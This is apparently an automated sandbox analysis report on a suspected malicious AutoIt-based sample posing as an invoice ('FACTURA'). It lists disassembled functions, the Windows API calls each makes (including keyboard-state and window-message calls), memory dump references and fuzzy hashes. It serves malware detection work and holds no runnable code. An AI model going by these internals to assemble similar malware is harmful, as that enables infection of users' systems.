                                                                            Function 00EF55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            • Opcode ID: 3252858b05c768c55781ee39c68c8aef14c047f93c279e5124aec4c17b6ce946
                                                                            • Instruction ID: 67107672b9e73fa2ae7f667d3221db29361a151a198e28d02a510c12df297688
                                                                            • Opcode Fuzzy Hash: 3252858b05c768c55781ee39c68c8aef14c047f93c279e5124aec4c17b6ce946
                                                                            • Instruction Fuzzy Hash: CC01FC72800A0CEBCF12AF648D024BE7BA1AFA0321F419115F73476151DB318611DF91
                                                                            Function 00EF53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            • __lock_file.LIBCMT ref: 00EF53EB
                                                                              • Part of subcall function 00EF6C11: __lock.LIBCMT ref: 00EF6C34
                                                                            • __fclose_nolock.LIBCMT ref: 00EF53F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            • Opcode ID: 96dea23721edc34a72e306a9564c7d77a4efcc7eed577b68ab26ee440c5706c0
                                                                            • Instruction ID: 9d9f2fb540ec3fb4de13feeb293503fe977077c06cb5f411bba59e7d271efe5a
                                                                            • Opcode Fuzzy Hash: 96dea23721edc34a72e306a9564c7d77a4efcc7eed577b68ab26ee440c5706c0
                                                                            • Instruction Fuzzy Hash: ADF09632901A0C9ADB116F799D017BD66E06F51374F20A105A764BB1C5CBFC89416B52
                                                                            Function 0116DE98 Relevance: 1.7, APIs: 1, Instructions: 169COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0116D708: GetFileAttributesW.KERNELBASE(?), ref: 0116D713
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0116DFFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCreateDirectoryFile
                                                                            • String ID:
                                                                            • API String ID: 3401506121-0
                                                                            • Opcode ID: aae0ffe8538c26d026c9f34f82c0e652119723feb79a69f7b0b852295534b8a0
                                                                            • Instruction ID: 9d16a006623ef6e727107341c06a34e63e699323305f11cec58e8968fd206f4c
                                                                            • Opcode Fuzzy Hash: aae0ffe8538c26d026c9f34f82c0e652119723feb79a69f7b0b852295534b8a0
                                                                            • Instruction Fuzzy Hash: 5C519135A1020896EF14DFA0D854BEF733AFF58700F00456DE60DE7290EB769A94CBA6
                                                                            Function 00EF0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction ID: de01eca886c0d1fe7843b9017b02257ffe957a32f26a6d32d96838476727f10f
                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                            • Instruction Fuzzy Hash: B231F3B4A001099BC718DF08C484A79F7A6FB49314B24A7A5E90AEB356D731EDC1DBC0
                                                                            Function 00F0FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 797793f885d86cd520bea9d0a7bb4bdf3e2f93d080ef7a715a1a4981bc40ed7b
                                                                            • Instruction ID: 1a753de0146947791323f4e3965ff51a09f160c1f547dd8877074aa169276a9c
                                                                            • Opcode Fuzzy Hash: 797793f885d86cd520bea9d0a7bb4bdf3e2f93d080ef7a715a1a4981bc40ed7b
                                                                            • Instruction Fuzzy Hash: 49412574A04341CFDB24CF24C444B1ABBE1FF45318F0998ADE9999B762C731E84ACB42
                                                                            Function 00ED7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            • Opcode ID: 6f0a05c8fc133cd8643a6b19c7dc9220ec7b0d6318a9f65a0b048225373deffc
                                                                            • Instruction ID: f65b54159d7f1e9f3b360f581e2acabd87d9ff157263091e8e17da01b146bcb9
                                                                            • Opcode Fuzzy Hash: 6f0a05c8fc133cd8643a6b19c7dc9220ec7b0d6318a9f65a0b048225373deffc
                                                                            • Instruction Fuzzy Hash: 3F21F472608A09EBEB148F25E8417B97BB5FB14350F25C82EE586D51E0EB328190F755
                                                                            Function 00ED4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00ED4BEF
                                                                              • Part of subcall function 00EF525B: __wfsopen.LIBCMT ref: 00EF5266
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E0F
                                                                              • Part of subcall function 00ED4B6A: FreeLibrary.KERNEL32(00000000), ref: 00ED4BA4
                                                                              • Part of subcall function 00ED4C70: _memmove.LIBCMT ref: 00ED4CBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                            • String ID:
                                                                            • API String ID: 1396898556-0
                                                                            • Opcode ID: bc5f77cb0570b77f9e17afc7fa37d37761596f5dc8ec3c64f0170085dec25a22
                                                                            • Instruction ID: 6c5332a8795e9fe3fed5f3c8e805e530168bf71b94f691cc5b2c4537050c5c66
                                                                            • Opcode Fuzzy Hash: bc5f77cb0570b77f9e17afc7fa37d37761596f5dc8ec3c64f0170085dec25a22
                                                                            • Instruction Fuzzy Hash: F4119471600209BBCF15BFB0C816FAD77E5EF64710F10842AF945BB2C1EA719A06A751
                                                                            Function 00F0FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: c25562e027a5fc0c9b28db8fe71eb36ef44635ea95b97eb7fa318bf78c40fe1a
                                                                            • Instruction ID: d98c2ea0cfe410088b215b108a4b641a78bea562d53a842582127637da15c864
                                                                            • Opcode Fuzzy Hash: c25562e027a5fc0c9b28db8fe71eb36ef44635ea95b97eb7fa318bf78c40fe1a
                                                                            • Instruction Fuzzy Hash: 2E213774908305DFCB14DF24C444A1ABBE1FF84314F099969E98967722D731E809DB52
                                                                            Function 00EF4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00EF48A6
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2597487223-0
                                                                            • Opcode ID: 2e6e3f2659f0f10772274927403d83e106291718867e9c565c989a737121010b
                                                                            • Instruction ID: 46d53f0ba31b10b0020442a4ac58c09dbd2c93f8d58f6555dac9ff095e89c0f4
                                                                            • Opcode Fuzzy Hash: 2e6e3f2659f0f10772274927403d83e106291718867e9c565c989a737121010b
                                                                            • Instruction Fuzzy Hash: 6AF0FFB190028CABDF15AFB48C063FF36E0AF00364F04A404B624BA1C1DBB88950DB41
                                                                            Function 00ED4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 18e72594355c58fc4ee6683f0a9fae7badf92ff5cf8cc49f86191635ff95ccf7
                                                                            • Instruction ID: cce5f0f8db13face106f6f52ab19b4c2f994a2c1dfc85f673f416405f60b438e
                                                                            • Opcode Fuzzy Hash: 18e72594355c58fc4ee6683f0a9fae7badf92ff5cf8cc49f86191635ff95ccf7
                                                                            • Instruction Fuzzy Hash: 9DF01CB1501711DFCB349F64D494852B7E1FF24329310997EE6D696750C7319845DB40
                                                                            Function 00EF0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF07B0
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_memmove
                                                                            • String ID:
                                                                            • API String ID: 2514874351-0
                                                                            • Opcode ID: ea27893251ea094b39920d0fef037dcedfc40d9c4763ca3e6e9229f7f2127c23
                                                                            • Instruction ID: eb3f41d446ea564d2d7925a7373243ce08fd7804b66e173efae9175a00e409a0
                                                                            • Opcode Fuzzy Hash: ea27893251ea094b39920d0fef037dcedfc40d9c4763ca3e6e9229f7f2127c23
                                                                            • Instruction Fuzzy Hash: 8EE0867690422857C720A6689C05FEA77DDDB887A1F0441B6FD0CD7244D9659C909690
                                                                            Function 00F38E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction ID: 5b17c6ff49197f378dc21ad33780d82e8ae16eb6d5a58c172173447f9af6daa6
                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction Fuzzy Hash: E6E092B1504B045FD7398A24D800BA373E1AB05325F00085DF6AA93241EB6278869759
                                                                            Function 0116D708 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0116D713
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction ID: 276c1abe0cb2388d97c5aee847ace9a77d068c7967d9788b491de8e8512c1474
                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction Fuzzy Hash: B8E08630605548DBDF1CCAE8A9056A973ACA708314F014654E545C3180DA368920D652
                                                                            Function 0116D6D8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0116D6E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction ID: 4fa0d691991e78fe6784ecf864df1bb449387833d53928dcacd32c7ef9920866
                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction Fuzzy Hash: C1D05E70A0620CABCB14CEECA90899977ACA705360F404794E91983280D6329D109751
                                                                            Function 00EF525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction ID: 9b28019e21cc881e5070377bfa499a8c979ff45a1c17a9c5ad721b55429ebafd
                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction Fuzzy Hash: E9B0927644020C77DE012A82FC02A593F699B51764F808020FB0C28172A673A6649A89
                                                                            Function 0116F0F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0116F109
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 8c026bd4cc022c4cf758de87feb3cd6ef1fe8ad6fb0adf9a0c24e5f39b66bf6d
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 17E0BF7494010EDFDB00DFA4D54969D7BB4EF04301F104161FD0192281D73199608A62

                                                                            Non-executed Functions

                                                                            Function 00F5CABC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 632windowkeyboardnativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F5CB37
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5CB95
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5CBD6
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5CC00
                                                                            • SendMessageW.USER32 ref: 00F5CC29
                                                                            • _wcsncpy.LIBCMT ref: 00F5CC95
                                                                            • GetKeyState.USER32(00000011), ref: 00F5CCB6
                                                                            • GetKeyState.USER32(00000009), ref: 00F5CCC3
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5CCD9
                                                                            • GetKeyState.USER32(00000010), ref: 00F5CCE3
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5CD0C
                                                                            • SendMessageW.USER32 ref: 00F5CD33
                                                                            • SendMessageW.USER32(?,00001030,?,00F5B348), ref: 00F5CE37
                                                                            • SetCapture.USER32(?), ref: 00F5CE69
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5CECE
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F5CEF5
                                                                            • ReleaseCapture.USER32 ref: 00F5CF00
                                                                            • GetCursorPos.USER32(?), ref: 00F5CF3A
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5CF47
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5CFA3
                                                                            • SendMessageW.USER32 ref: 00F5CFD1
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D00E
                                                                            • SendMessageW.USER32 ref: 00F5D03D
